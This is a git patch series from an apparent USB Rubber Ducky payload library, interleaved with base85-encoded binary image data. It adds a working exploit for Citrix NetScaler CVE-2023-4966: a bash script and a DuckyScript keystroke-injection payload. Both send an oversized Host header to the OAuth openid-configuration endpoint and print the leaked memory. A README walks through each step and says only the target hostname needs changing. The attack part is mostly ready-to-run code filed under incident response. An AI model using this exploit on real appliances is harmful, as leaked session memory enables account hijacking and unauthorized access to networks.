zU+BZ{@pZGYkg&3{yD0g*wOn7h$&CIQIwm*Yq%o0FtfA+?Z#Wd{XaMGR>p8tWB|r##X=h;@Ebip0Em=@F?N* z%WK3dx58M%2amhuw+-~kq%^wqkzTQ-@e(!qT>}l{E4i*er%`~apT6?&GN=~*sVNf9 zXV6P~!-da#A~Qi(YfY|+b^Iw#Ny&W4=;PE6B*Gp1kEv#M-3_W1vUdTqZo`PFye&S0 zv?L{8OOyrBuQ3JWA@Q96<00|M?}h?%ZCTdjs-4}FQC$aMs!4A)q3NZM+UgT%G4Z;M zDd)LjO?w=-PVcXzoej6H#Wy?*3WNNdR6JOI6(*_lK&q%WoWa68D}P}t02JiL}&*;RFtZwYd~JN(5{h-hKd1kYy4$g@$n z;odA9mUsDuBNSBaclcrA3l|3UfJ*1>f!k9m(6i4WeOd71Lt`V0fPk(*o#OM2-wEho zT;^Tld`79OQKIU)O`hP=%UoZ9NsINh2;0H}t2vjXEugO1dh$N5wQ|q_a}*;13&Go& zF{#*&G1A=a52DuMqgZC$iPW;kZGo#e^uJd%QkamQBp&?f-%Pk<6`F9gHu@|rMSKr; zIbUc^ubf*VS*T5TRk5V(!1BrXRfCOIV^c0W^|ZKfT$}(#!-@wj218Nan;7atWPCP3 z!g1oNh1QXe48}3XZiCeR)9=^1g1l>CIz;UB^ZNcwUb6EG%vx7*om|&mX%wFu9hX08 zN`w&9_+wn|N~SCf6#OykBAE9=m~cqz_IubpDc9L*B76@RS1FhJ((+h3?-msd48|dG z3Xk+@gLyIWoD1X`0Wz#gGn(wt*{SsNv?ymwZdbW%*!<>gl)x@L!T=y#o_PTTZ-Y|f zh9>XW>lK6|0Z3fX@mN+hQisC22+mE&7yI4@klwe6!@k(6N3SP?R>E*)Vh$L~)w@FR3UM8RlivCuy|QJJQx*q5ITi@(MfJ zVa1pVv@I!-MMifGVw(m^kACk~5cV=(H+ z8aigY>RthrA7~3{BnGFKEwEV$q_&r0$!myDXM6VV>wWnL&Ag;KMxfA^aug<13w~x3 z5MjsZ%=z-rQF_sA{W?y8XR_}Clr^75?i;1NN^n(v#J(f9BOspF*n{2q+fZn_CEoSz zYm{-i+i*702~CfngisbEZ>gUs#i`a0cVuQpvRiQ z)4@kT$mzsoJ=pRO4O8+f@*OABVoVp>C6WTVU{3@}Vr<|>ViRJYA@2APEUj$kR1~k7 z`7z^%Lf%Gysmd$6n|N5)e3QZ{lV1k`?6#DRxtH|2u|@{{=H{a`_fhb9`}y&)%wbj! zVM5!&GHDq1W`%rNZcXZGk9hf%SGHS20ZX>odf{Jn$A(VIe!lo=fl&a;Y4Ul#)BV1n zp+~?W<K~Qi zVg6EfgGnv<0N;h>s>NI2lrbWr3?XEE)4r`e^G5G@%_GMl(UUFEj7D- z2dnC-VVldi#<{?y?jQqQyR(-wL`tcE&tzTG$tDH3-D>wZl+7#~!_A}oQ*+js1YL8a zyRHS5c`L>@n)|{{wlg+-d=X`gWs|FrNvLb^%B`WRuL6w_>*06CalPGG(}#BZBM!pl zZJ|ftz9aJ-xEA8^z+5giuOoavKwU0al!{!BlGpVjF0Qv-E-T2A7&2D1{6=2vJGnam zP0cMv=+Im8Y#LR5p`NDlur9- zW-=G}#9Pd!`$61wlbM({7kev1%#5k^nFQFNSHi>7N*(LHhZ&9UqyVYB4ML$tMGSu$ zi-0~V-dPW4cd`8{0wjmk83kahXkfvfEp9C zMiPNcedgR-GL~u8D`w^Sj{Te-klECC%P;ULu8?6D4I(7fuv`xl2se+R4OxIM@b*r~ zxNkz`{>C*uh#sHwTa&@k6_Q`dn$(a(NH!SDupefec=JnW#P%fqY+%XwE_A!us>vt1 z#`W*l$`xX?7vcAVJD%k5?H7awYR0gZecWf*Rc>Hi6dyGlS=hy}ej=AMTm0#eS8VL= zfMTnZsz`mn+hHh>;3Lo-Mme7<{F7Ta*er$>(NZ!lxfaTJ?{3F03>54N`pPiV{5RK; zy1Qc^bZ5^n+w2O|Qj^bdoF2V-^cU2~n-WY%OUlbwmzpZ;@b}bkReS*evnew=`CaUf z#^z~TR7-fL(#N2X?jFD9uplYHx*w?0VIWv?Mpdhx5uVnGt-h#yj@}SpT=+%WR325$^+a?uhm?`S>m9MgVdh z3eqk+p8>{QTAgLg$#mPcj0u&ujYRp&s60q##q9kcYV?r?WP?|$DW!#{JUSS;Av2}= zisC0C@<(k^b9&(qf|>J~Xxa7Fbg*d>K9}sSz3j^x&%bQqE=N#&Vo}Ky>gbW`8}35R z)563neJ<*gxb(u$!-Pv?QL*n9i>43QX+CQ9bDz=tX;WZt=h2tAInpWGGJkQV;qUKD zX~GK>&@=y4-{_t~ySRISoFyH&6TnJYH_t(~J=^4T#1)XFJfv+7{zPauwtfMjMFQ_rpH%H>*DI!E%KV=;+%d-J404ql#nD zP4$u&$99amzoK|`oA7s^O-w7Inb2Tw8dld`HauBE*>!A`s#OElxeM>?jQ-SP=-zrr zx;yvZZIb@_TH&Q=Tes?VRwT~bi*D`<%3R^s7n>$w?5x!{)A@-ox{|4^s2ia{P9Ie5 z!GYrxR@ZTsxycfd^&;Be%Dx1897B&T{3N!u-mUk|_bWT(J~BsA?$c@+ljNtsoM$Mi&nJ?SUNeuV$@eKNb6PL;?z`wq-+=;-w-$`zbz&M@ z`ebr9HeQ#y_1DwQ|6u@V(haZg?xR|JJ=!ty%m0M%_Uy;)HUypT|4H+4^yw)RrG+QG zy%qiE0^lx_*4V-!PFJ>z{;41Swqxokw^6@Zrd?BGs_wAR#>1u2jJa9_OleL`t_h?+ z?_LCvVJ3;ZOoUZ@5}fhEeDUIqk(8K-@_C!MH5!M>);)r<55drHCTsICcvSyhSbs0K zOF7C!X&ge)i0=@PPL8d+%KDw&&RRHPQ_sg=>)Hk{l5oWAZ89vv+JaABcj&y|y%J#v zJpJ}s3vJ-Wt^Zazbb~aBF8h{I#E(`lrzZU?Krv}|xZC2;uB9p7K!<pgG} z!~AW);phU@7e5{xqV3@mlgs0dFSz^!@Cd1L`-AKfERHTr#UNt+RGMmqrc`rVb6n0T zkeJSGy1G-`=Tf#HHyCu4+qX# zfttR(3p<;5!0eZuB%ElGj(k90`zWJrVNxo+SPi{)9ww59mm3#*9Ek7o-sRNCO-Mf6 zH0AR3kkjibUiC3{Pp={U&b=tK*3Klnv3+<~bx{sGg;a;%hY*&kT4n^`N<@=%O-^29 z55?Te6nzYnv~scz4Y{FO-{&yYDF`Y(zPO)z+*U8I%y&kb@?bVnNJtTAR($L!)z%sd zx-`=~ajsaie=dsS`5P2aJhs(Pi0pHQ3cC93<&?@SlqJ`W`qm3XSFpU!Q_w?skkmF5x`r5BuF)UnrW3Eq$eYKD*GmojN zeN(;ZIim6e6io0kdstRZ_8l3l7*w^f)`TwQe!QOgBEuxMmis(WfAjZs*8wHQt$IZw zHMD`*MfHd1Zd2kAKkN(({%hy)O-ymwwV1SJaa4 zix!#*S=rO;!j8WCHr}Vg>U*WN7A9i5QcgeXx+P7(mw4oVlKc|AxC2+(;3|zRKak?- zW1(TDx@Y6x`H|q(1ScIl_qQC=(*ISs|36Xr|3Lv^(p@P3BY>dVeV!1`3b^ZBjoPe~ z6rpRhogw2Nt4pQP3+p08?aq{A^^stJVj={1eiQ?TxBYLR3;>KmV;#l!mP;2~Oj zm7k;7FnTjHi~OBhAkfiMjm^wP@5f>#t$89hR`86l+;fv3N&lM+x`DvX`=cG9CK)TY zdOblUP|jSzl?}+5+4mjx4wY0lZUTge2H>x5R>_yzK%OKcwx=;_}lN5ZSl;* z-*6x*F?Kk)Y7)648m`HwteX~Vt3E&eGt#p=GLB`g-h zKc&xBixbQHw`{YTKJvH)&iDH#(kDgZ8v!oe679RTx)iYPi3ks!(Q&Z5;b~+_4vs{v z6koIH>d_moO%=9l<$}O1#BjKQsE8K7g*_`FtNnGv>T*rcj4s^4Wz77c*tm%)LG2D4 z1hJ1baPiGOF$$Ey~CLkc`*NN-7tbPYA z!)h77A(m=uKM+1}H;w-%)p5V@{FnDB|3D9^NE|RmGyx-blS>aGudcSp^+~^Tx1=Zl zY|bx9WCd0KMODy7IvU6VE`zovp=&g4a<$hPX|=;$E(!|UaCl)LID*nIrt7LkGSpGE z{pl664gF25-eoo!g*$6Fel&l-&46B}<`-b~dPtOZ9hIrim*?Jl9&%C+2ZLNcZAL<@ zvUxLg$XR=^vE`YJPn(JJuS#M-b16e+EStIFAGwF_e8^7XbN?|cVN!!kaL!~`N;jjN zQnR|_!b)@cE_2Sg%^qq_v2kwWqh1$i zzC>y*$3=ku2GVAGreq_S8$r4%b&_ zjqjUHF=;8+1+|~wUN^z?pKxVDX5#nlJoRf7DU8HIDVJLdbRJEODzPWGEYT(g&4yb! zR3Inqe;dB}|DBfqi(Jod-{}7y*?})vzJAXjP<(9~h_xu1!9CNG^)i(=E1)b8aPd=Y zHMh}Od(e76U6x-cMtylP01*!1aF9!-jh?L^*v>lkoN^1R!P~xZsPs%0#dDn5?xWsQ z3eK`=Q}OH|$1(HI5DnCKW{MdPL=I<>aV>kepRXp3N2i39Qo~_zX@ha1HQ_lAPhbQs zv%zT8H3ijkGmnM-&0{IhF1Z_B)Fv))B~@gsuwv+Fb(apq)XMt2Gy{k4cobGPzkae_aKtqM5JbWoixtn zXyZbe!GLAtdM-KyA$YqI{dB#a8m52u{S>#DJqmt-`?904HYVC#ltItsZf(VWl+5m< zmHWAyyLb-vmc!8)JlrMx|nwlJcQP|?eItI#uqygv`*I(k*1wdP9s@2j?fD_1ESL62v&zBy0$fYvn~H&n z!hSq&!btdp+60o#TVLVS2L0K1!45HX%G)lsYrT`-Y_TEDj+Te@HaRAHaFMr=v zDC442h7a{(Ro4(Oy}^#D1sh?6Ce*0Q@1h*ZxnI6O$D%!rF zkQ0F{uPwPXmjR8a{yP4VIHpGPbqJsY_4XSOLb?BSmMaUnl$?a$i*&v^b60aP!uY#Z zoB8PRaT(H-JiKleI3%W3^;=yZ|AET##CwG-ks5c|PKQGqtRDv`3z5OMwO?;<Zx} zR>p9(%NXSwRbtZYbVF)~9~eKwXN9l{1-ODah_=GuZ_x;D-Ex2ba?L7#FYgF7ehj;Q z=ZQG~C^qkj3GtjyO7d0@4O_jU2wVPlbjS1+e)=4X8O7E?r$Vai-qNHzbIwgB8pvm5 z>#6iEYw3h8qVBSJJe%?zS!msu3_i5S4!zv9yE6Wkdec)wM+3FZ8^v*hwf&byu>IJQ zNmwJu7|r!_HsC7;L8LgY=d&Ak^`Gtj57H&F4SDYkWxosKd(M|nRVM*wI}H?}?_Jwq zF}DFX-QtKb1zljsC!&prDUJI3zUH`f4ScUG)x%Tqm#DfQ4|imFi&xa_KKNhcVfUqle_ zH!(c0mzk)RP2@{i_ZAJXBs8j*`vk~4c}5*b^c)^0*yXw+=~x)exTjflqU5)b!@+ongX<7RPG@Dp>5krRhW5_=4ttn-Qz5TAp35W0u2z zVw3#L2w8pbyI#oMO%z2}YL0+PxRAc*3f7T2!vC90Q4+|G|7f$cDdp-R=m#FE$ht(A z-8j7{=&X=Yw_{;%Zx7PrAF!28$3ofXjJ~hU?tzTjGrVEhgg|KVSJT_`wg}jHe1&3Z!Qoefr#J9^3-oO4PIZezNt!7$vp73Gq88%w!3E7@Dh-xZYoK z3}W3RgJVAJL^BcgmX{9a*W~q#X#>^k^!Chg*l&wYEarpX_zve7T@jW(S_rpre>5`Q z&hn~a4Rq3Yqqx_&KahCr-8?PV*H4~FcsgwAay$?Hq4BW8b3z=Q%9fz($_zJ#RJ2d~ z7cnY}s^DrtJAT(QwL`JpOud!VK)ttTIH|HLRzA_@bK#-xQrinw0bRx(* z`DbTBsvhg%Osd1p>lJt=1C0InMc3CqCu$zW=>#;IgIZ>O0wdrGQAglk;0Kwk(Y|bI z_2PLycV*IjBwM?u5-FF7Ut0Tl`K1 z+DM8fiPR9P@$+g)xNbdQYyNRudKvDVJyf|DV@5Ia@3aHbuX~o%IGwpaxmS#r{63u% zUjmALFd4M4^lGTVX(H?_NaWTmkB}=_nWmHJ&VZKNW!m6D@=FeDrGKuhdf5~Yz8@*C z1G1Xhv@e_RDRV(R6-Cup-Sfi6`anY?$Y)j+QKHLn2LIsS^M5^J{9klUpWWjB0doHA z4pRKjg3UbHlk$T+!ydi>WjQs`DcCq{{rYw@UQ>? literal 0 HcmV?d00001 diff --git a/payloads/library/execution/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt similarity index 100% rename from payloads/library/execution/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt rename to payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/script.sh b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/script.sh new file mode 100644 index 000000000..2f36954f1 --- /dev/null +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/script.sh @@ -0,0 +1,17 @@ +#!/bin/bash + +hostname="$1" # first parameter + +header_value=$(yes a | head -n 24576 | tr -d '\n') + +headers="-H 'Host:$header_value'" + +response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10) + +if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then + echo "--- Dumped memory ---" + echo "$response" | cut -c 131051- + echo "--- End ---" +else + echo "Could not dump memory" +fi diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt new file mode 100644 index 000000000..712f2aada --- /dev/null +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt @@ -0,0 +1,59 @@ +* REM ################################################################################## +* REM # # +* REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # +* REM # Author : Aleff # +* REM # Version : 1.0 # +* REM # Category : incident-response # +* REM # Target : Citrix NetScaler ADV; NetScaler Gateway # +* REM # # +* REM ################################################################################## + +* REM Windows Version + +QUACK DELAY 3000 +QUACK GUI r +QUACK DELAY 500 +QUACK STRING powershell +QUACK ENTER +QUACK DELAY 1000 + +QUACK STRING $header_value = 'a' * 24576 +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $header_value = $header_value -replace "\n", "" +QUACK ENTER +QUACK DELAY 500 + +QUACK STRING $headers="-H 'Host:$header_value'" +QUACK ENTER +QUACK DELAY 500 + +QUACK STRING $headers = @{'Host' = $header_value} +QUACK ENTER +QUACK DELAY 500 + +* REM Replace #HOSTNAME with your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200) +QUACK STRING $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10 +QUACK ENTER +QUACK DELAY 500 + +QUACK STRING if ($response.Substring(0, 3) -eq "200") { +QUACK ENTER +QUACK DELAY 500 +QUACK STRING Write-Host "--- Dumped memory ---" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $response.Substring(131050) # 131051 - 1 +QUACK ENTER +QUACK DELAY 500 +QUACK STRING Write-Host "--- End ---" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING } else { +QUACK ENTER +QUACK DELAY 500 +QUACK STRING Write-Host "Could not dump memory"} +QUACK ENTER \ No newline at end of file From 98927159335ae96bda592c71d4dfde2781d40871 Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 6 Jun 2024 16:32:36 +0200 Subject: [PATCH 3/6] Adapted to the use of variables [+] Added vars [+] Attackmode [-] Img replaced with a link [+] README adapted to the new payload --- .../README.md | 29 +++++++++--------- .../assets/1.png | Bin 62296 -> 0 bytes .../lin-payload.txt | 14 ++++----- .../script.sh | 4 +-- .../win-payload.txt | 14 ++++----- 5 files changed, 29 insertions(+), 32 deletions(-) delete mode 100644 payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/assets/1.png diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md index b04d39ccc..0d61e0e56 100644 --- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md @@ -43,17 +43,18 @@ The following supported versions of NetScaler ADC and NetScaler Gateway are affe This bulletin only applies to customer-managed NetScaler ADC and NetScaler Gateway products. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action. -![](./assets/1.png) +![](https://i.ibb.co/x7SRvGf/1.png) ***Source**: The information was acquired from the official website of [support.citrix.com](#sources).* ## Settings -The sole configuration parameter that requires modification is the hostname, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the "payload.txt" file to specify the desired address. +The sole configuration parameter that requires modification is the HOSTNAME, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the payload.txt file to specify the desired address. -```DuckyScript -* REM Replace #HOSTNAME with your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200) -QUACK STRING $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" +```plaintext +HOSTNAME='192.168.1.200' +... +QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" ``` ## Payload Description Windows @@ -82,10 +83,10 @@ Here, a variable `$headers` is created as a hashtable containing the HTTP header $headers = @{ 'Host' = $header_value } ``` -This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "#HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section). +This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "$HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section). ```powershell -$uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" +$uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" ``` Here, the HTTP request to the specified URL is executed using the GET method and with the headers defined in the `$headers` variable. The result of the request is stored in the `$response` variable. @@ -130,7 +131,7 @@ headers="-H 'Host:$header_value'" This line uses cURL to send a request to the specified URL with the constructed `headers`. The `-s` flag suppresses progress meter and error messages, while the `-k` flag allows cURL to perform an insecure SSL connection. The `--connect-timeout 10` flag sets a connection timeout of 10 seconds. The response is stored in the `response` variable. ```bash -response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10) +response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10) ``` In this block, it checks if the exit status of the cURL command is 0 (indicating a successful request) and if the first three characters of the response are "200" (HTTP success code). If both conditions are met, it prints `--- Dumped memory ---`, followed by a portion of the response starting from character 131,051, and then indicates that the hostname is vulnerable. If the conditions are not met, it prints `Could not dump memory`. @@ -139,7 +140,7 @@ In this block, it checks if the exit status of the cURL command is 0 (indicating if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then echo "--- Dumped memory ---" echo "$response" | cut -c 131051- - echo "The #HOSTNAME is vulnerable!" + echo "The $HOSTNAME is vulnerable!" echo "--- End ---" else echo "Could not dump memory" @@ -148,7 +149,7 @@ fi ## Script sh -The script.sh script accepts one parameter, which should be the target hostname without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit. +The script.sh script accepts one parameter, which should be the target HOSTNAME without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit. Example Execution: @@ -166,14 +167,12 @@ After assigning execute permissions, the above command allows the user to run th ## Sources -- [1] Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967 -- [2] Detect Rady: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready -- [3] Passive Windows Detect: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt -- [4] Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/ +1) Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967 +2) Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/ ## Credits -

Aleff

+

Aleff

diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/assets/1.png b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/assets/1.png deleted file mode 100644 index 105a0867fb47d7eae1805f19b80b508dd27f08b1..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 62296 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 